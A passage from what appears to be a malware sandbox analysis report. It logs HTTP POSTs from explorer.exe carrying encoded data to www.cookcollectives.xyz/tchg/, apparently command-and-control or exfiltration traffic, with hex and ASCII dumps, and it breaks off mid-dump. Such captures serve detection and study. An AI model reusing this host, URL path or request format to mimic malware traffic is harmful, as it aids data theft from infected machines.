                                                                                                                    May 30, 2023 11:08:43.702493906 CEST513INData Raw: 36 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 26 23 32 30 30 36
                                                                                                                    Data Ascii: 6a1<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>&#20061;&#28216;&#20250;&#22312;&#32447;&#23448;&#26041;&#32593;&#31449;&#95;&#20061;&#28216;&#20250;&#23448;&#32593;&#106;&#57;</title><meta name="keywords" content="
                                                                                                                    May 30, 2023 11:08:43.702564955 CEST513INData Raw: 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 39 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30
                                                                                                                    Data Ascii: top:0;left:0;width:100%;height:100%;background:#fff;z-index: 999999;padding-top:200px;font-size:20px;text-align:center;color:#000'>,&#20061;&#28216;&#20250;&#22312;&#32447;&#23448;&#26041;&#32593;&#31449;&#95;&#20061;&#28216;&#2025
                                                                                                                    May 30, 2023 11:08:43.702629089 CEST513INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    15192.168.11.2049774199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:48.906312943 CEST515OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.cookcollectives.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.cookcollectives.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 79 30 4c 79 67 70 65 74 4c 4e 4c 62 4c 64 67 78 30 47 71 4e 4b 69 65 67 61 35 43 52 53 57 63 41 76 34 31 51 6c 5a 66 63 53 2d 71 4b 4c 78 6b 6e 78 5a 35 68 54 59 65 69 32 4c 70 35 49 76 46 6b 37 68 4f 6b 46 68 76 70 76 6b 70 77 79 32 76 68 74 71 66 4f 4e 65 36 64 71 76 44 78 4f 52 7e 4c 75 2d 6a 34 77 66 30 58 42 41 38 2d 45 65 41 69 30 6a 62 4d 56 73 56 35 6d 36 35 72 6d 39 6f 61 77 48 41 50 61 77 4b 50 6a 50 39 58 65 57 4a 7a 62 4c 75 39 33 47 64 61 65 33 46 37 53 53 69 62 6c 4a 62 33 5a 58 34 65 54 41 4f 56 77 4c 77 30 41 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=y0LygpetLNLbLdgx0GqNKiega5CRSWcAv41QlZfcS-qKLxknxZ5hTYei2Lp5IvFk7hOkFhvpvkpwy2vhtqfONe6dqvDxOR~Lu-j4wf0XBA8-EeAi0jbMVsV5m65rm9oawHAPawKPjP9XeWJzbLu93Gdae3F7SSiblJb3ZX4eTAOVwLw0AQ).
                                                                                                                    May 30, 2023 11:08:49.191667080 CEST516INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:08:48 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                                                    May 30, 2023 11:08:49.191757917 CEST517INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                    Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                                                    May 30, 2023 11:08:49.191814899 CEST518INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                    Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                                                    May 30, 2023 11:08:49.191864014 CEST519INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                                                    Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    16192.168.11.2049775199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:51.602180004 CEST521OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.cookcollectives.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.cookcollectives.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 79 30 4c 79 67 70 65 74 4c 4e 4c 62 49 38 51 78 32 68 57 4e 43 69 65 6e 56 5a 43 52 59 32 63 45 76 34 35 51 6c 59 4c 32 54 49 53 4b 4b 56 67 6e 77 64 56 68 55 59 65 69 39 72 70 47 4d 76 46 37 37 68 43 47 46 6b 58 70 76 6b 39 77 6f 6c 33 68 38 4b 66 4e 47 2d 36 43 74 76 44 79 4b 52 7e 56 75 2d 7e 5a 77 62 38 58 43 77 51 2d 46 63 6f 69 6c 47 37 50 43 63 56 67 33 61 35 6f 70 64 6f 59 77 48 63 48 61 31 6e 79 6b 39 68 58 65 33 70 7a 61 4c 75 2d 67 6d 64 5a 42 48 45 6c 61 52 62 43 69 6f 48 56 41 47 64 37 57 78 4f 46 7e 37 34 36 55 50 53 57 6a 73 6c 35 4c 6a 58 58 63 4c 74 75 54 50 48 7a 4c 6f 33 77 33 71 68 33 4f 35 5a 6e 6c 54 30 74 30 4f 6b 5a 76 30 6d 5f 44 64 64 55 7a 49 78 65 76 41 47 4f 79 51 44 78 73 4f 76 48 48 4a 4e 31 55 4d 78 65 69 6b 4d 2d 32 56 49 6d 57 72 6d 46 6b 5a 63 39 36 6c 4e 4b 37 46 41 31 50 4a 79 42 39 4a 73 47 6a 38 34 74 36 43 32 34 44 6a 79 4d 62 5f 39 72 48 6f 50 4a 58 69 71 6d 68 36 68 64 4e 6e 53 6d 39 54 39 32 6c 64 51 79 56 68 63 2d 28 43 66 37 69 72 71 75 53 61 46 57 4a 6a 73 41 75 71 49 70 46 55 76 39 31 4b 45 4c 56 66 47 34 6f 46 73 33 4c 36 49 73 39 52 30 77 4d 54 71 32 51 4d 65 37 30 61 28 44 5a 30 35 66 4c 34 55 6c 6a 59 53 4c 41 65 33 4d 77 59 34 4f 4c 65 54 74 66 35 48 63 33 30 35 75 35 49 4c 39 74 7a 33 5a 6d 30 46 53 37 45 53 65 34 63 39 66 73 6c 49 62 4e 7a 35 7a 55 78 6f 31 45 62 6c 6c 28 62 52 79 30 71 79 73 69 32 39 63 43 77 65 63 58 50 75 56 58 4d 58 7a 32 64 4e 4d 56 31 78 4e 73 5f 33 4b 50 54 6d 74 28 72 67 71 65 55 68 6e 51 6c 44 6a 4c 76 73 55 72 49 70 74 7a 59 32 6a 39 72 41 4b 77 6d 30 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=y0LygpetLNLbI8Qx2hWNCienVZCRY2cEv45QlYL2TISKKVgnwdVhUYei9rpGMvF77hCGFkXpvk9wol3h8KfNG-6CtvDyKR~Vu-~Zwb8XCwQ-FcoilG7PCcVg3a5opdoYwHcHa1nyk9hXe3pzaLu-gmdZBHElaRbCioHVAGd7WxOF~746UPSWjsl5LjXXcLtuTPHzLo3w3qh3O5ZnlT0t0OkZv0m_DddUzIxevAGOyQDxsOvHHJN1UMxeikM-2VImWrmFkZc96lNK7FA1PJyB9JsGj84t6C24DjyMb_9rHoPJXiqmh6hdNnSm9T92ldQyVhc-(Cf7irquSaFWJjsAuqIpFUv91KELVfG4oFs3L6Is9R0wMTq2QMe70a(DZ05fL4UljYSLAe3MwY4OLeTtf5Hc305u5IL9tz3Zm0FS7ESe4c9fslIbNz5zUxo1Ebll(bRy0qysi29cCwecXPuVXMXz2dNMV1xNs_3KPTmt(rgqeUhnQlDjLvsUrIptzY2j9rAKwm0.
                                                                                                                    May 30, 2023 11:08:51.889487982 CEST522INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:08:51 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                                                    May 30, 2023 11:08:51.889566898 CEST523INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                    Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                                                    May 30, 2023 11:08:51.889626026 CEST525INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                    Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                                                    May 30, 2023 11:08:51.889674902 CEST525INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                                                    Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    17192.168.11.2049776199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:54.303848028 CEST530OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.cookcollectives.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.cookcollectives.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 79 30 4c 79 67 70 65 74 4c 4e 4c 62 49 38 51 78 32 68 57 4e 43 69 65 6e 56 5a 43 52 59 32 63 45 76 34 35 51 6c 59 4c 32 54 49 61 4b 4c 6d 6f 6e 78 36 42 68 56 59 65 69 79 37 70 39 4d 76 46 79 37 68 61 43 46 6c 72 35 76 69 35 77 6f 53 72 68 38 5a 33 4e 44 2d 36 44 6e 50 44 77 4f 52 28 53 75 2d 6a 61 77 61 59 74 42 42 55 2d 45 65 77 69 30 41 7a 4d 64 38 56 35 33 61 35 30 69 39 6f 6d 77 48 4a 61 61 31 6a 79 6b 5f 56 58 65 46 52 7a 59 59 57 2d 37 6d 64 65 59 33 46 6c 44 42 62 42 69 6f 54 72 41 47 63 5a 57 77 4b 46 7e 35 77 36 56 4d 71 56 6a 4d 6c 35 49 6a 58 57 4e 62 68 71 54 4c 76 72 4c 6f 7a 77 33 71 4a 33 4d 5a 5a 6e 6a 79 30 73 33 75 6b 54 6c 55 6e 70 49 39 5a 63 7a 49 6c 77 76 42 69 4f 79 67 48 78 74 35 37 48 46 6f 4e 31 57 73 78 59 76 45 4d 54 28 31 49 69 57 72 32 33 6b 5a 38 74 36 6e 68 4b 30 45 67 31 61 62 4b 43 28 70 73 63 67 38 35 6c 7e 43 71 6b 44 69 44 4e 62 5f 39 37 48 70 37 4a 58 53 36 6d 67 2d 56 61 41 58 54 73 30 7a 38 69 38 74 4d 73 56 68 52 78 28 42 4f 32 69 73 61 75 53 36 46 57 5a 77 45 44 35 71 49 75 4e 30 76 56 78 4b 46 44 56 66 43 65 6f 41 55 4e 4c 4f 77 73 38 68 6b 77 47 6a 71 35 47 63 65 67 36 36 28 4a 49 6b 35 66 4c 34 49 78 6a 59 4f 4c 56 36 37 4d 28 4c 51 4f 4e 4f 76 74 54 5a 48 57 33 30 34 32 35 49 33 34 74 7a 4f 2d 6d 30 5a 34 37 48 7e 65 34 4e 74 66 68 41 30 59 47 6a 35 79 51 78 70 6a 41 62 35 32 28 61 39 71 30 70 62 62 69 45 35 63 59 77 4f 63 54 50 75 53 42 63 57 61 68 74 4e 61 48 46 39 72 73 37 76 61 50 54 6a 67 28 6f 51 71 50 69 63 67 50 6d 54 64 49 4d 6b 63 70 66 52 37 38 66 4f 53 6c 75 49 39 6a 67 63 53 31 46 6f 43 6f 58 58 66 42 56 4b 63 6e 33 75 45 5a 72 31 4f 50 4f 31 67 43 47 34 37 45 43 6e 43 65 76 6f 53 55 6a 30 5a 65 5f 33 56 61 57 41 70 58 47 65 35 34 6e 7a 76 76 7a 50 50 28 55 4b 4b 37 67 4e 56 30 59 6e 36 30 35 77 51 6f 6a 59 38 64 6e 62 71 69 6e 32 47 59 41 36 46 41 72 4a 74 47 42 6d 46 4a 49 65 33 4b 6f 71 2d 6f 54 30 42 52 4d 51 70 4e 6f 63 6d 6f 58 46 64 7a 57 42 37 73 4c 31 35 68 48 69 51 55 79 52 6e 4c 42 74 57 38 53 46 69 67 57 51 48 78 2d 52 31 36 55 7e 4d 6f 32 6b 56 69 6d 69 74 54 78 49 61 5a 4d 76 69 67 68 36 31 39 48 34 33 63 4e 79 34 6c 75 70 31 34 70 28 77 6b 31 4a 7a 45 7a 48 62 32 34 35 51 50 47 6b 38 35 7a 7e 36 70 6a 61 5a 54 58 61 79 74 76 38 41 28 35 38 5a 35 44 62 42 65 6f 51 5f 4e 54 35 77 77 44 72 30 4b 4c 58 5f 59 78 44 78 35 44 33 79 6a 6c 28 55 7e 54 47 6b 36 76 69 68 4c 39 39 30 30 63 48 6b 57 56 66 54 79 4c 38 33 6f 52 32 58 70 31 71 65 43 74 30 41 66 49 30 35 65 50 38 74 73 4b 45 70 6b 39 31 72 61 74 41 64 6d 49 6b 55 38 6c 58 77 5a 4d 36 32 53 4b 46 6c 6a 